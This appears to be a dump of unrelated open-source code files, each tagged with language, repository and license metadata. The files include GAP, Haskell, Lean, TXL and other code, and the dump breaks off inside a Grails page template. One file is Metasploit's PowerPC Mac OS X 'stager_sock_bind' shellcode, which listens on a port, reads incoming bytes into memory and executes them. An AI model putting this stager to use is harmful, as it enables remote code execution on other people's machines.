"BSD-2-Clause"
] |
# Copyright (c) 2018-2021, Carnegie Mellon University
# See LICENSE for details
Class(SMP_Unparser, SMP_UnparseMixin, CUnparserProg);
Class(SMP_MacroUnparser, SMP_UnparseMixin, CMacroUnparserProg);
Class(OpenMP_Unparser, OpenMP_UnparseMixin, CUnparserProg);
Class(OpenMP_MacroUnparser, OpenMP_UnparseMixin, CMacroUnparserProg);
# suggested values: bufIters=64 (16 for older machines), maxRank=1 (larger value increases search space)
# Example: opts := InitGTLibgen(64, 1)
#
InitGTLibgen := function(bufIters, maxRank, useComplex)
local opts;
LibgenHardcodeStrides();
opts := CopyFields(InitLibgen(When(useComplex, CplxLibgenDefaults, LibgenDefaults)),
rec(
useDeref := true,
breakdownRules := rec(
GT := [ CopyFields(GT_Base, rec(maxSize := 32)),
CopyFields(GT_BufReshape, rec(bufIters := bufIters)),
CopyFields(GT_DFT_CT, rec(minSize := 33, maxRank := maxRank)),
GT_NthLoop, GT_Par ],
DFT := [ CopyFields(DFT_CT, rec(maxSize:=32)),
CopyFields(DFT_GT_CT, rec(minSize:=32)),
DFT_Base ],
InfoNt := [Info_Base])
));
opts.formulaStrategies.preRC := [ HfuncSumsRules ];
return opts;
end;
InitSMPGTLibgen := function(bufIters, maxRank, useComplex, useOpenMP)
local opts;
opts := CopyFields(InitGTLibgen(bufIters, maxRank, useComplex), rec(
unparser := Cond(
useComplex and useOpenMP, OpenMP_MacroUnparser,
useComplex and not useOpenMP, SMP_MacroUnparser,
not useComplex and useOpenMP, OpenMP_Unparser,
not useComplex and not useOpenMP, SMP_Unparser)));
opts.formulaStrategies.sigmaSpl := [ MergedRuleSet(StandardSumsRules,RulesSMP), HfuncSumsRules ];
opts.formulaStrategies.rc := opts.formulaStrategies.sigmaSpl;
if not useOpenMP then
opts.subParams := [var("num_threads", TInt), var("tid", TInt)];
opts.profile := When(LocalConfig.osinfo.isWindows(),
LocalConfig.cpuinfo.profile.threads(),
profiler.default_profiles.linux_x86_threads
);
fi;
return opts;
end;
| GAP | 4 | sr7cb/spiral-software | namespaces/spiral/libgen/recgt.gi | [
"BSD-2-Clause-FreeBSD"
] |
;;
;
; Name: stager_sock_bind
; Qualities: Can Have Nulls
; Platforms: MacOS X / PPC
; Authors: H D Moore <hdm [at] metasploit.com>
; Version: $Revision: 1612 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Binds a port, listens, accepts, reads 8192 bytes and
; then jumps into the loaded payload. Socket descriptor
; is left in r30.
;;
.globl _main
.text
_main:
;; socket
li r3, 2
li r4, 1
li r5, 6
li r0, 97
sc
xor r0, r0, r0
mr r30, r3
bl bind
.long 0x00022212
.long 0x00000000
bind:
mflr r4
li r5, 0x10
li r0, 104
mr r3, r30
sc
xor r0, r0, r0
listen:
li r0, 106
mr r3, r30
sc
xor r0, r0, r0
accept:
mr r3, r30
li r0, 30
li r4, 16
stw r4, -24(r1)
subi r5, r1, 24
subi r4, r1, 16
sc
xor r0, r0, r0
mr r30, r3
reader:
li r0, 3
mr r3, r30
subi r4, r1, 8192
li r5, 8192
mtlr r4
sc
xor r0, r0, r0
blr
xor r0, r0, r0
| Assembly | 3 | OsmanDere/metasploit-framework | external/source/shellcode/osx/ppc/stager_sock_bind.asm | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
MyConvertFrom-StringData @'
string1=fallback string1 for en-US
string2=fallback string2 for en-US
'@
42 | PowerShell | 2 | Jellyfrog/PowerShell | test/powershell/Language/Scripting/I18n.Tests_fallback.psd1 | [
"MIT"
] |
% Generic filtering of nonterminals
% Jim Cordy, May 2010
define xml_source_coordinate
'< [SPOFF] 'source [SP] 'file=[stringlit] [SP] 'startline=[stringlit] [SP] 'endline=[stringlit] '> [SPON] [NL]
end define
define end_xml_source_coordinate
[NL] '< [SPOFF] '/ 'source '> [SPON] [NL]
end define
define source_unit
[xml_source_coordinate]
[potential_clone]
[end_xml_source_coordinate]
end define
redefine program
[repeat source_unit]
end redefine
% Main program
rule main
% Get the list of nonterminals to be filtered
import TXLargs [stringlit*]
FilteredNTs [stringlit*]
% Make a global nothing
construct Empty [empty]
deconstruct * [any] Empty
Nothing [any]
export Nothing
skipping [source_unit]
replace $ [source_unit]
BeginXML [xml_source_coordinate]
PC [potential_clone]
EndXML [end_xml_source_coordinate]
by
BeginXML
PC [filter each FilteredNTs]
EndXML
end rule
rule filter FilteredNTstring [stringlit]
construct FilteredNT [id]
_ [unquote FilteredNTstring]
% Replace all the given NTs by nothing
import Nothing [any]
replace $ [any]
Any [any]
where
Any [istype FilteredNT]
by
Nothing
end rule
| TXL | 5 | coder-chenzhi/SQA | SourcererCC/parser/java/txl/generic-filter.txl | [
"Apache-2.0"
] |
attribute [reducible]
definition nat_has_add2 : has_add nat :=
has_add.mk (λ x y : nat, x + y)
attribute [reducible]
definition nat_has_add3 : nat → has_add nat :=
λ n, has_add.mk (λ x y : nat, x + y)
open tactic
set_option pp.all true
-- Example where instance canonization does not work.
-- Remark: we can "fix" it by re-running defeq_simp until there is no change.
-- However, this is too expensive. Well, if users want they can define their own defeq_simp that implements this
-- behavior.
example (a b : nat) (H : (λ x : nat, @has_add.add nat (nat_has_add3 x) a b) = (λ x : nat, @has_add.add nat nat_has_add2 a x)) : true :=
by do
s ← simp_lemmas.mk_default,
e ← get_local `H >>= infer_type, s^.dsimplify [] e {fail_if_unchanged := ff} >>= trace,
trace "---------",
-- The following should work
e ← get_local `H >>= infer_type,
e ← s^.dsimplify [] e {fail_if_unchanged := ff},
s^.dsimplify [] e {fail_if_unchanged := ff} >>= trace,
constructor
| Lean | 5 | ericrbg/lean | tests/lean/defeq_simp4.lean | [
"Apache-2.0"
] |
fileFormatVersion: 2
guid: cfba650367f74698998618a4a140d696
timeCreated: 1613591825 | Unity3D Asset | 0 | samisuleman10/open-project-1 | UOP1_Project/Assets/Scripts/SaveSystem/SerializableScriptableObject.cs.meta | [
"Apache-2.0"
] |
call %SCRIPT_HELPERS_DIR%\setup_pytorch_env.bat
echo Copying over test times file
copy /Y "%PYTORCH_FINAL_PACKAGE_DIR_WIN%\.pytorch-test-times.json" "%TEST_DIR_WIN%"
pushd test
echo Run jit_profiling tests
python run_test.py --include test_jit_legacy test_jit_fuser_legacy --verbose --determine-from="%1"
if ERRORLEVEL 1 exit /b 1
popd
| Batchfile | 3 | Hacky-DH/pytorch | .jenkins/pytorch/win-test-helpers/test_python_jit_legacy.bat | [
"Intel"
] |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE DeriveTraversable #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# LANGUAGE ViewPatterns #-}
{-# OPTIONS_GHC
-fno-warn-unused-binds -fno-warn-unused-imports -fcontext-stack=328 #-}
module SwaggerPetstore.API
-- * Client and Server
( ServerConfig(..)
, SwaggerPetstoreBackend
, createSwaggerPetstoreClient
, runSwaggerPetstoreServer
, runSwaggerPetstoreClient
, runSwaggerPetstoreClientWithManager
, SwaggerPetstoreClient
-- ** Servant
, SwaggerPetstoreAPI
) where
import SwaggerPetstore.Types
import Control.Monad.Except (ExceptT)
import Control.Monad.IO.Class
import Data.Aeson (Value)
import Data.Coerce (coerce)
import Data.Function ((&))
import qualified Data.Map as Map
import Data.Monoid ((<>))
import Data.Proxy (Proxy(..))
import Data.Text (Text)
import qualified Data.Text as T
import GHC.Exts (IsString(..))
import GHC.Generics (Generic)
import Network.HTTP.Client (Manager, defaultManagerSettings, newManager)
import Network.HTTP.Types.Method (methodOptions)
import qualified Network.Wai.Handler.Warp as Warp
import Servant (ServantErr, serve)
import Servant.API
import Servant.API.Verbs (StdMethod(..), Verb)
import Servant.Client (Scheme(Http), ServantError, client)
import Servant.Common.BaseUrl (BaseUrl(..))
import Web.HttpApiData
data FormUpdatePetWithForm = FormUpdatePetWithForm
{ updatePetWithFormName :: Text
, updatePetWithFormStatus :: Text
} deriving (Show, Eq, Generic)
instance FromFormUrlEncoded FormUpdatePetWithForm where
fromFormUrlEncoded inputs = FormUpdatePetWithForm <$> lookupEither "name" inputs <*> lookupEither "status" inputs
instance ToFormUrlEncoded FormUpdatePetWithForm where
toFormUrlEncoded value =
[ ("name", toQueryParam $ updatePetWithFormName value)
, ("status", toQueryParam $ updatePetWithFormStatus value)
]
data FormUploadFile = FormUploadFile
{ uploadFileAdditionalMetadata :: Text
, uploadFileFile :: FilePath
} deriving (Show, Eq, Generic)
instance FromFormUrlEncoded FormUploadFile where
fromFormUrlEncoded inputs = FormUploadFile <$> lookupEither "additionalMetadata" inputs <*> lookupEither "file" inputs
instance ToFormUrlEncoded FormUploadFile where
toFormUrlEncoded value =
[ ("additionalMetadata", toQueryParam $ uploadFileAdditionalMetadata value)
, ("file", toQueryParam $ uploadFileFile value)
]
-- For the form data code generation.
lookupEither :: FromHttpApiData b => Text -> [(Text, Text)] -> Either String b
lookupEither key assocs =
case lookup key assocs of
Nothing -> Left $ "Could not find parameter " <> (T.unpack key) <> " in form data"
Just value ->
case parseQueryParam value of
Left result -> Left $ T.unpack result
Right result -> Right $ result
-- | Servant type-level API, generated from the Swagger spec for SwaggerPetstore.
type SwaggerPetstoreAPI
= "pet" :> ReqBody '[JSON] Pet :> Verb 'POST 200 '[JSON] () -- 'addPet' route
:<|> "pet" :> Capture "petId" Integer :> Header "api_key" Text :> Verb 'DELETE 200 '[JSON] () -- 'deletePet' route
:<|> "pet" :> "findByStatus" :> QueryParam "status" (QueryList 'CommaSeparated (Text)) :> Verb 'GET 200 '[JSON] [Pet] -- 'findPetsByStatus' route
:<|> "pet" :> "findByTags" :> QueryParam "tags" (QueryList 'CommaSeparated (Text)) :> Verb 'GET 200 '[JSON] [Pet] -- 'findPetsByTags' route
:<|> "pet" :> Capture "petId" Integer :> Verb 'GET 200 '[JSON] Pet -- 'getPetById' route
:<|> "pet" :> ReqBody '[JSON] Pet :> Verb 'PUT 200 '[JSON] () -- 'updatePet' route
:<|> "pet" :> Capture "petId" Integer :> ReqBody '[FormUrlEncoded] FormUpdatePetWithForm :> Verb 'POST 200 '[JSON] () -- 'updatePetWithForm' route
:<|> "pet" :> Capture "petId" Integer :> "uploadImage" :> ReqBody '[FormUrlEncoded] FormUploadFile :> Verb 'POST 200 '[JSON] ApiResponse -- 'uploadFile' route
:<|> "store" :> "order" :> Capture "orderId" Text :> Verb 'DELETE 200 '[JSON] () -- 'deleteOrder' route
:<|> "store" :> "inventory" :> Verb 'GET 200 '[JSON] (Map.Map String Int) -- 'getInventory' route
:<|> "store" :> "order" :> Capture "orderId" Integer :> Verb 'GET 200 '[JSON] Order -- 'getOrderById' route
:<|> "store" :> "order" :> ReqBody '[JSON] Order :> Verb 'POST 200 '[JSON] Order -- 'placeOrder' route
:<|> "user" :> ReqBody '[JSON] User :> Verb 'POST 200 '[JSON] () -- 'createUser' route
:<|> "user" :> "createWithArray" :> ReqBody '[JSON] [User] :> Verb 'POST 200 '[JSON] () -- 'createUsersWithArrayInput' route
:<|> "user" :> "createWithList" :> ReqBody '[JSON] [User] :> Verb 'POST 200 '[JSON] () -- 'createUsersWithListInput' route
:<|> "user" :> Capture "username" Text :> Verb 'DELETE 200 '[JSON] () -- 'deleteUser' route
:<|> "user" :> Capture "username" Text :> Verb 'GET 200 '[JSON] User -- 'getUserByName' route
:<|> "user" :> "login" :> QueryParam "username" Text :> QueryParam "password" Text :> Verb 'GET 200 '[JSON] Text -- 'loginUser' route
:<|> "user" :> "logout" :> Verb 'GET 200 '[JSON] () -- 'logoutUser' route
:<|> "user" :> Capture "username" Text :> ReqBody '[JSON] User :> Verb 'PUT 200 '[JSON] () -- 'updateUser' route
-- | Server or client configuration, specifying the host and port to query or serve on.
data ServerConfig = ServerConfig
{ configHost :: String -- ^ Hostname to serve on, e.g. "127.0.0.1"
, configPort :: Int -- ^ Port to serve on, e.g. 8080
} deriving (Eq, Ord, Show, Read)
-- | List of elements parsed from a query.
newtype QueryList (p :: CollectionFormat) a = QueryList
{ fromQueryList :: [a]
} deriving (Functor, Applicative, Monad, Foldable, Traversable)
-- | Formats in which a list can be encoded into a HTTP path.
data CollectionFormat
= CommaSeparated -- ^ CSV format for multiple parameters.
| SpaceSeparated -- ^ Also called "SSV"
| TabSeparated -- ^ Also called "TSV"
| PipeSeparated -- ^ `value1|value2|value2`
| MultiParamArray -- ^ Using multiple GET parameters, e.g. `foo=bar&foo=baz`. Only for GET params.
instance FromHttpApiData a => FromHttpApiData (QueryList 'CommaSeparated a) where
parseQueryParam = parseSeparatedQueryList ','
instance FromHttpApiData a => FromHttpApiData (QueryList 'TabSeparated a) where
parseQueryParam = parseSeparatedQueryList '\t'
instance FromHttpApiData a => FromHttpApiData (QueryList 'SpaceSeparated a) where
parseQueryParam = parseSeparatedQueryList ' '
instance FromHttpApiData a => FromHttpApiData (QueryList 'PipeSeparated a) where
parseQueryParam = parseSeparatedQueryList '|'
instance FromHttpApiData a => FromHttpApiData (QueryList 'MultiParamArray a) where
parseQueryParam = error "unimplemented FromHttpApiData for MultiParamArray collection format"
parseSeparatedQueryList :: FromHttpApiData a => Char -> Text -> Either Text (QueryList p a)
parseSeparatedQueryList char = fmap QueryList . mapM parseQueryParam . T.split (== char)
instance ToHttpApiData a => ToHttpApiData (QueryList 'CommaSeparated a) where
toQueryParam = formatSeparatedQueryList ','
instance ToHttpApiData a => ToHttpApiData (QueryList 'TabSeparated a) where
toQueryParam = formatSeparatedQueryList '\t'
instance ToHttpApiData a => ToHttpApiData (QueryList 'SpaceSeparated a) where
toQueryParam = formatSeparatedQueryList ' '
instance ToHttpApiData a => ToHttpApiData (QueryList 'PipeSeparated a) where
toQueryParam = formatSeparatedQueryList '|'
instance ToHttpApiData a => ToHttpApiData (QueryList 'MultiParamArray a) where
toQueryParam = error "unimplemented ToHttpApiData for MultiParamArray collection format"
formatSeparatedQueryList :: ToHttpApiData a => Char -> QueryList p a -> Text
formatSeparatedQueryList char = T.intercalate (T.singleton char) . map toQueryParam . fromQueryList
-- | Backend for SwaggerPetstore.
-- The backend can be used both for the client and the server. The client generated from the SwaggerPetstore Swagger spec
-- is a backend that executes actions by sending HTTP requests (see @createSwaggerPetstoreClient@). Alternatively, provided
-- a backend, the API can be served using @runSwaggerPetstoreServer@.
data SwaggerPetstoreBackend m = SwaggerPetstoreBackend
{ addPet :: Pet -> m (){- ^ -}
, deletePet :: Integer -> Maybe Text -> m (){- ^ -}
, findPetsByStatus :: Maybe [Text] -> m [Pet]{- ^ Multiple status values can be provided with comma separated strings -}
, findPetsByTags :: Maybe [Text] -> m [Pet]{- ^ Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing. -}
, getPetById :: Integer -> m Pet{- ^ Returns a single pet -}
, updatePet :: Pet -> m (){- ^ -}
, updatePetWithForm :: Integer -> FormUpdatePetWithForm -> m (){- ^ -}
, uploadFile :: Integer -> FormUploadFile -> m ApiResponse{- ^ -}
, deleteOrder :: Text -> m (){- ^ For valid response try integer IDs with value < 1000. Anything above 1000 or nonintegers will generate API errors -}
, getInventory :: m (Map.Map String Int){- ^ Returns a map of status codes to quantities -}
, getOrderById :: Integer -> m Order{- ^ For valid response try integer IDs with value <= 5 or > 10. Other values will generated exceptions -}
, placeOrder :: Order -> m Order{- ^ -}
, createUser :: User -> m (){- ^ This can only be done by the logged in user. -}
, createUsersWithArrayInput :: [User] -> m (){- ^ -}
, createUsersWithListInput :: [User] -> m (){- ^ -}
, deleteUser :: Text -> m (){- ^ This can only be done by the logged in user. -}
, getUserByName :: Text -> m User{- ^ -}
, loginUser :: Maybe Text -> Maybe Text -> m Text{- ^ -}
, logoutUser :: m (){- ^ -}
, updateUser :: Text -> User -> m (){- ^ This can only be done by the logged in user. -}
}
newtype SwaggerPetstoreClient a = SwaggerPetstoreClient
{ runClient :: Manager -> BaseUrl -> ExceptT ServantError IO a
} deriving Functor
instance Applicative SwaggerPetstoreClient where
pure x = SwaggerPetstoreClient (\_ _ -> pure x)
(SwaggerPetstoreClient f) <*> (SwaggerPetstoreClient x) =
SwaggerPetstoreClient (\manager url -> f manager url <*> x manager url)
instance Monad SwaggerPetstoreClient where
(SwaggerPetstoreClient a) >>= f =
SwaggerPetstoreClient (\manager url -> do
value <- a manager url
runClient (f value) manager url)
instance MonadIO SwaggerPetstoreClient where
liftIO io = SwaggerPetstoreClient (\_ _ -> liftIO io)
createSwaggerPetstoreClient :: SwaggerPetstoreBackend SwaggerPetstoreClient
createSwaggerPetstoreClient = SwaggerPetstoreBackend{..}
where
((coerce -> addPet) :<|>
(coerce -> deletePet) :<|>
(coerce -> findPetsByStatus) :<|>
(coerce -> findPetsByTags) :<|>
(coerce -> getPetById) :<|>
(coerce -> updatePet) :<|>
(coerce -> updatePetWithForm) :<|>
(coerce -> uploadFile) :<|>
(coerce -> deleteOrder) :<|>
(coerce -> getInventory) :<|>
(coerce -> getOrderById) :<|>
(coerce -> placeOrder) :<|>
(coerce -> createUser) :<|>
(coerce -> createUsersWithArrayInput) :<|>
(coerce -> createUsersWithListInput) :<|>
(coerce -> deleteUser) :<|>
(coerce -> getUserByName) :<|>
(coerce -> loginUser) :<|>
(coerce -> logoutUser) :<|>
(coerce -> updateUser)) = client (Proxy :: Proxy SwaggerPetstoreAPI)
-- | Run requests in the SwaggerPetstoreClient monad.
runSwaggerPetstoreClient :: ServerConfig -> SwaggerPetstoreClient a -> ExceptT ServantError IO a
runSwaggerPetstoreClient clientConfig cl = do
manager <- liftIO $ newManager defaultManagerSettings
runSwaggerPetstoreClientWithManager manager clientConfig cl
-- | Run requests in the SwaggerPetstoreClient monad using a custom manager.
runSwaggerPetstoreClientWithManager :: Manager -> ServerConfig -> SwaggerPetstoreClient a -> ExceptT ServantError IO a
runSwaggerPetstoreClientWithManager manager clientConfig cl =
runClient cl manager $ BaseUrl Http (configHost clientConfig) (configPort clientConfig) ""
-- | Run the SwaggerPetstore server at the provided host and port.
runSwaggerPetstoreServer :: MonadIO m => ServerConfig -> SwaggerPetstoreBackend (ExceptT ServantErr IO) -> m ()
runSwaggerPetstoreServer ServerConfig{..} backend =
liftIO $ Warp.runSettings warpSettings $ serve (Proxy :: Proxy SwaggerPetstoreAPI) (serverFromBackend backend)
where
warpSettings = Warp.defaultSettings & Warp.setPort configPort & Warp.setHost (fromString configHost)
serverFromBackend SwaggerPetstoreBackend{..} =
(coerce addPet :<|>
coerce deletePet :<|>
coerce findPetsByStatus :<|>
coerce findPetsByTags :<|>
coerce getPetById :<|>
coerce updatePet :<|>
coerce updatePetWithForm :<|>
coerce uploadFile :<|>
coerce deleteOrder :<|>
coerce getInventory :<|>
coerce getOrderById :<|>
coerce placeOrder :<|>
coerce createUser :<|>
coerce createUsersWithArrayInput :<|>
coerce createUsersWithListInput :<|>
coerce deleteUser :<|>
coerce getUserByName :<|>
coerce loginUser :<|>
coerce logoutUser :<|>
coerce updateUser)
| Haskell | 5 | wwadge/swagger-codegen | samples/server/petstore/haskell-servant/lib/SwaggerPetstore/API.hs | [
"Apache-2.0"
] |
fn bar<const X: u8, 'a>(_: &'a ()) {
//~^ ERROR lifetime parameters must be declared prior to const parameters
}
fn foo<const X: u8, T>(_: &T) {}
fn main() {}
| Rust | 4 | ohno418/rust | src/test/ui/const-generics/const-param-before-other-params.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
default
{
state_entry()
{
llSetParcelMusicURL("http://www.archive.org/download/Torley_Wong_-_The_Final_Selection/Torley_Wong-Lovers__Dance.mp3");
}
}
| LSL | 3 | Misterblue/opensim | bin/assets/ScriptsAssetSet/llSetParcelMusicURL.lsl | [
"BSD-3-Clause"
] |
program HelloWorld;
{$APPTYPE CONSOLE}
begin
WriteLn('Hello World');
end. | Pascal | 1 | venusing1998/hello-world | d/delphi.pas | [
"MIT"
] |
--
section
variable A : Type
parameter a : A
end
section
variable A : Type
variable a : A
end
| Lean | 4 | JLimperg/lean | tests/lean/var.lean | [
"Apache-2.0"
] |
domain: "[M, N, O, P, Q, R, S, T, U] -> { S1[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= Q and i1 <= -1 + N and i2 >= P and i2 <= -1 + M; S3[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= 1 and i1 <= -1 + N and i2 >= P and i2 <= -1 + M; S4[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= 1 and i1 <= -1 + N and i2 >= 1 and i2 <= -1 + M; S2[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= Q and i1 <= -1 + N and i2 >= 1 and i2 <= -1 + M }"
child:
context: "[M, N, O, P, Q, R, S, T, U] -> { [] : M >= 10 and N >= 10 and O >= 10 and P >= 1 and P <= 2 and Q >= 1 and Q <= 2 and R >= 1 and R <= 2 and S >= 0 and S <= 1 and T >= 0 and T <= 1 and U >= 0 and U <= 1 }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S4[i0, i1, i2] -> [(i0)]; S2[i0, i1, i2] -> [(i0)]; S1[i0, i1, i2] -> [(i0)]; S3[i0, i1, i2] -> [(i0)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
child:
sequence:
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S1[i0, i1, i2]; S2[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S2[i0, i1, i2] -> [(i1)]; S1[i0, i1, i2] -> [(i1)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
child:
sequence:
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S1[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S1[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S2[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S2[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S3[i0, i1, i2]; S4[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S4[i0, i1, i2] -> [(i1)]; S3[i0, i1, i2] -> [(i1)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
child:
sequence:
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S3[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S3[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S4[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S4[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
| Smalltalk | 2 | chelini/isl-haystack | test_inputs/codegen/cloog/reservoir-long.st | [
"MIT"
] |
//
// Copyright (c) Microsoft. All rights reserved.
// Licensed under the MIT license. See LICENSE.md file in the project root for full license information.
//
#pragma once
#include "ConvolutionEngine.h"
#include "BatchNormalizationEngine.h"
namespace Microsoft { namespace MSR { namespace CNTK {
template <class ElemType>
class CuDnnConvolutionEngineFactory
{
public:
static std::unique_ptr<ConvolutionEngine<ElemType>> Create(ConvolveGeometryPtr geometry, DEVICEID_TYPE deviceId,
ImageLayoutKind imageLayout, size_t maxTempMemSizeInSamples,
PoolKind poolKind, bool forceDeterministicAlgorithms,
bool poolIncludePad, bool inputHasFreeDimension);
static bool IsSupported(DEVICEID_TYPE deviceId, ConvolveGeometryPtr geometry, PoolKind poolKind);
};
template <class InoutType, class StatType>
class CuDnnBatchNormEngineFactory
{
public:
static std::unique_ptr<BatchNormEngine<InoutType, StatType>> Create(DEVICEID_TYPE deviceId, const TensorShape& inOutT,
bool spatial, ImageLayoutKind imageLayout);
};
// REVIEW alexeyk: wrong place? It is currently used only in unit tests but I can't add it there because of the build issues.
// Timer that can be used to measure CUDA calls.
// Uses CUDA event and will synchronize(!) the stream when Stop is called.
class MATH_API CudaTimer
{
public:
CudaTimer(): m_start(nullptr), m_stop(nullptr)
{
}
~CudaTimer();
void Start();
void Stop();
float Elapsed();
DISABLE_COPY_AND_MOVE(CudaTimer);
private:
void* m_start;
void* m_stop;
};
} } }
| C | 4 | burhandodhy/CNTK | Source/Math/CuDnnFactories.h | [
"MIT"
] |
#pragma once
#include "envoy/compression/compressor/factory.h"
#include "envoy/extensions/compression/brotli/compressor/v3/brotli.pb.h"
#include "envoy/extensions/compression/brotli/compressor/v3/brotli.pb.validate.h"
#include "source/common/http/headers.h"
#include "source/extensions/compression/brotli/compressor/brotli_compressor_impl.h"
#include "source/extensions/compression/common/compressor/factory_base.h"
namespace Envoy {
namespace Extensions {
namespace Compression {
namespace Brotli {
namespace Compressor {
namespace {
const std::string& brotliStatsPrefix() { CONSTRUCT_ON_FIRST_USE(std::string, "brotli."); }
const std::string& brotliExtensionName() {
CONSTRUCT_ON_FIRST_USE(std::string, "envoy.compression.brotli.compressor");
}
} // namespace
class BrotliCompressorFactory : public Envoy::Compression::Compressor::CompressorFactory {
public:
BrotliCompressorFactory(
const envoy::extensions::compression::brotli::compressor::v3::Brotli& brotli);
// Envoy::Compression::Compressor::CompressorFactory
Envoy::Compression::Compressor::CompressorPtr createCompressor() override;
const std::string& statsPrefix() const override { return brotliStatsPrefix(); }
const std::string& contentEncoding() const override {
return Http::CustomHeaders::get().ContentEncodingValues.Brotli;
}
private:
static BrotliCompressorImpl::EncoderMode encoderModeEnum(
envoy::extensions::compression::brotli::compressor::v3::Brotli::EncoderMode encoder_mode);
const uint32_t chunk_size_;
const bool disable_literal_context_modeling_;
const BrotliCompressorImpl::EncoderMode encoder_mode_;
const uint32_t input_block_bits_;
const uint32_t quality_;
const uint32_t window_bits_;
};
class BrotliCompressorLibraryFactory
: public Compression::Common::Compressor::CompressorLibraryFactoryBase<
envoy::extensions::compression::brotli::compressor::v3::Brotli> {
public:
BrotliCompressorLibraryFactory() : CompressorLibraryFactoryBase(brotliExtensionName()) {}
private:
Envoy::Compression::Compressor::CompressorFactoryPtr createCompressorFactoryFromProtoTyped(
const envoy::extensions::compression::brotli::compressor::v3::Brotli& config) override;
};
DECLARE_FACTORY(BrotliCompressorLibraryFactory);
} // namespace Compressor
} // namespace Brotli
} // namespace Compression
} // namespace Extensions
} // namespace Envoy
| C | 4 | dcillera/envoy | source/extensions/compression/brotli/compressor/config.h | [
"Apache-2.0"
] |
<%--
Copyright 2012 Netflix, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="layout" content="main"/>
<title>Create New Fast Property</title>
</head>
<body>
<div class="body">
<h1>Create New Fast Property</h1>
<g:if test="${flash.message}">
<div class="message">${flash.message}</div>
</g:if>
<g:hasErrors bean="${cmd}">
<div class="errors">
<g:renderErrors bean="${cmd}" as="list"/>
</div>
</g:hasErrors>
<g:form action="save" method="post" class="validate">
<div class="dialog">
<table class="fastPropertyAttributes ${params.hasAdvancedAttributes ? '': 'hideAdvancedItems'}">
<tbody>
<tr class="prop">
<td class="name">
<label for="key">Name:</label>
</td>
<td class="value">
<g:textField class="fastPropertyValue required" id="key" name="key" value="${params.key}"/>
</td>
</tr>
<tr class="prop">
<td class="name">
<label for="value">Value:</label>
</td>
<td class="value">
<g:textArea cols="30" rows="3" class="fastPropertyValue" id="value" name="value" value="${params.value}"/>
</td>
</tr>
<tr class="prop">
<td class="name">
<label for="updatedBy">Updated by:</label>
</td>
<td class="value">
<g:textField class="required" id="updatedBy" name="updatedBy" placeholder="jsmith" value="${updatedBy}"/>
<span class="toggle fakeLink" id="showAdvancedOptionsToCreateFastProperty">Advanced Options</span>
</td>
</tr>
<g:if test="${fastPropertyInfoUrl}">
<tr>
<td colspan="2"><a href="${fastPropertyInfoUrl}">Fast Property Documentation</a></td>
</tr>
</g:if>
<tr class="prop advanced">
<td class="name">
<label for="ttl">TTL:</label>
</td>
<td class="value">
<g:textField id="ttl" name="ttl" value="${params.ttl}"/>
<g:select name="ttlUnit" value="${params.ttlUnit ?: 'Days'}" from="${ttlUnits}" />
</td>
</tr>
<tr class="prop advanced">
<td class="name">
<label for="constraints">Constraints:</label>
</td>
<td class="value">
<g:textField id="constraints" name="constraints" value="${params.constraints}"/>
</td>
</tr>
<tr>
<td colspan="2">
<h2>Scoping (highest priority first):</h2>
</td>
</tr>
<tr class="prop advanced">
<td class="name">
<label for="serverId">Instance ID:</label>
</td>
<td class="value">
<g:textField id="serverId" name="serverId" value="${params.serverId}"/>
</td>
</tr>
<tr class="prop advanced">
<td class="name">
<label for="asg">ASG:</label>
</td>
<td class="value">
<g:select name="asg" noSelection="['':'Default (all ASGs)']" value="${params.asg}" from="${asgNames}"
class="allowEmptySelect" />
</td>
</tr>
<tr class="prop advanced">
<td class="name">
